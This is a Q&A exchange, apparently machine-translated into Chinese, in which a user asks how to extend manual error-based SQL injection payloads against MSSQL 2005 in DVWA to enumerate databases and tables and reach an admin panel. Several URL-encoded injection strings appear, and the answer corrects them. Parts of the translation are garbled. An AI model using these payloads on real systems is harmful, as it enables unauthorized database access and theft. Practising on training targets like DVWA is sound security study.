2005 - DVWA - SQL注入

Question

我又带着另一个关于dvwa的问题回来了，这次我升级到了MsSQL 2005，我还有另外一组问题。我不明白几件事。我想找个好心的人向我说清楚。

因此，基本上，和往常一样-我的目标是从DVWA获得所有数据库，以及使用手动注入技术升级到管理面板。

到目前为止，我拥有的是数据库，但我对语法的变化感到有点困惑。我要求服务器获取数据库，它返回给我的是第一个数据库。我的查询如下：

+
and+1=
    convert
    (
       int,db_name()
    )
--

我的第一个问题是--如何编辑这个查询，以便能够看到所有的数据库，因为据我所知，这个查询只会删除SQL数据中的第一个数据库。好的，我的第二个问题是，当我使用这个查询查找表时，第一个被删除的数据库是"information“：

+
and+1=
    convert
    ( 
       int,
       (
          select+top+1+table_name+from+information_schema.tables
       )
    )
--

它返回了该数据库的第一个表。首先，假设我有比第一个数据库更多的数据库，我如何更改这个查询以获取该数据库名称的表。其次，它返回的表是tbl_info_id。

请注意，服务器正在coldfusion上运行IIS6.0。如我所知，要从该数据库请求下一个表，我必须创建一个查询，如下所示：

+
and+1=
    convert
    (
       int,
       (
          select+top+1+table_name+from+
              information_schema.tables+where+table_name+not+in('tbl_info_id')
       )
    )
--

当我编写它时，服务器如何用以下方式进行响应：

[SQLServer]Incorrect syntax near 'tbl_info_id'.

仅此而已，如果有人能向我解释这一切，我将不胜感激！干杯。

Answer 1

这有两件事不对：

convert
(
   int,
   (
      select+top+1+table_name+from+
          information_schema.tables+where+table_name+not+in('tbl_info_id')
   )
)

第一种是积极的迹象。用单个空格替换它们。

第二种情况是，您正在尝试将非数字字符串转换为整数。不会计算的。

关于逻辑，您的文章说您需要数据库名称，但是您的代码正在寻找表名。如果您想要数据库名，请执行以下操作：

select name
from sys.databases